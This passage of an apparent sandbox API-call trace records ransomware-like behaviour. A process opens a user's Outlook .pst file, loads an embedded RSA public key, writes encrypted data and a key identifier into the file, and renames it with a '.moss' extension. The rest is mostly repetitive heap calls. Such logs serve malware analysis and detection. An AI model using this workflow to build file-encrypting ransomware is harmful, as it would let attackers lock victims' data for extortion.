(pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned=".pst" [0170.443] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.444] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=271360) returned 1 [0170.444] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.447] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x423da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.448] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.449] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.449] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x25805, lpOverlapped=0x0) returned 1 [0170.452] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.452] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.452] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.452] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0170.453] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.453] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.453] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.453] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.453] GetLastError () returned 0x0 [0170.453] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.453] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0170.453] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0170.453] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.453] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.453] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.453] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.456] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.457] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x42400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.457] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.281] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.281] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ba0 [0171.281] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b48820 [0171.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b48820, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0171.281] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48c50 [0171.281] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.281] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ba0 | out: hHeap=0xcd0000) returned 1 [0171.281] WriteFile (in: hFile=0x664, lpBuffer=0x3b48c50*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48c50*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0171.281] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c50 | out: hHeap=0xcd0000) returned 1 [0171.281] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0171.281] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0171.281] CloseHandle (hObject=0x664) returned 1 [0171.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45fd8 [0171.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8b0) returned 0x3b4b098 [0171.284] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45fd8 | out: hHeap=0xcd0000) returned 1 [0171.284] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.moss")) returned 1 [0171.285] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.285] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.285] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.286] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e3280 | out: hHeap=0xcd0000) returned 1 [0171.286] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0171.287] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0171.287] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0171.287] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2840 | out: hHeap=0xcd0000) returned 1 [0171.287] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0171.287] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ba0 [0171.287] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0171.287] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.287] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.287] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.287] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.287] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.287] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.287] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.287] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.287] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.287] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.287] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.287] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.287] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.287] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.287] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.287] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.287] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.287] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.287] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.287] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.287] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.287] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.288] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.288] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.288] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.288] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.288] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0171.288] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.288] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.288] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.288] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.288] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.288] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.288] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.288] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.288] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.288] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.288] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.288] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.288] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.288] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.288] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.288] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.288] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.288] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.288] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.288] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.288] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.288] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.288] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.288] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.288] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.288] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.288] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.288] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.289] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.289] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.289] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.289] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.289] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.289] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.289] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.289] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.289] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.289] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.289] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.289] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.289] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.289] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.289] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.289] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.289] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.289] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.289] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.289] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.289] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.289] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.289] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.289] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.289] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.289] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.289] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.289] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.289] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.289] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.289] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.289] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.289] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.289] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.289] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.289] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.290] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.290] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.290] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.290] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.290] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.290] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.290] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.290] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.290] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.290] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.290] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.290] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0171.290] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.290] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.290] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.290] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.290] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.290] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.290] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.290] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.290] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.290] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.290] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.290] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.290] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.290] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.290] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.290] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.290] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.290] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.290] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.290] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.290] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.291] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.291] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.291] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.291] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.291] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.291] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.291] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.291] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.291] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.291] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.291] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.291] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.291] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.291] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.291] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.291] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0171.291] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0171.291] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.291] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.291] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: 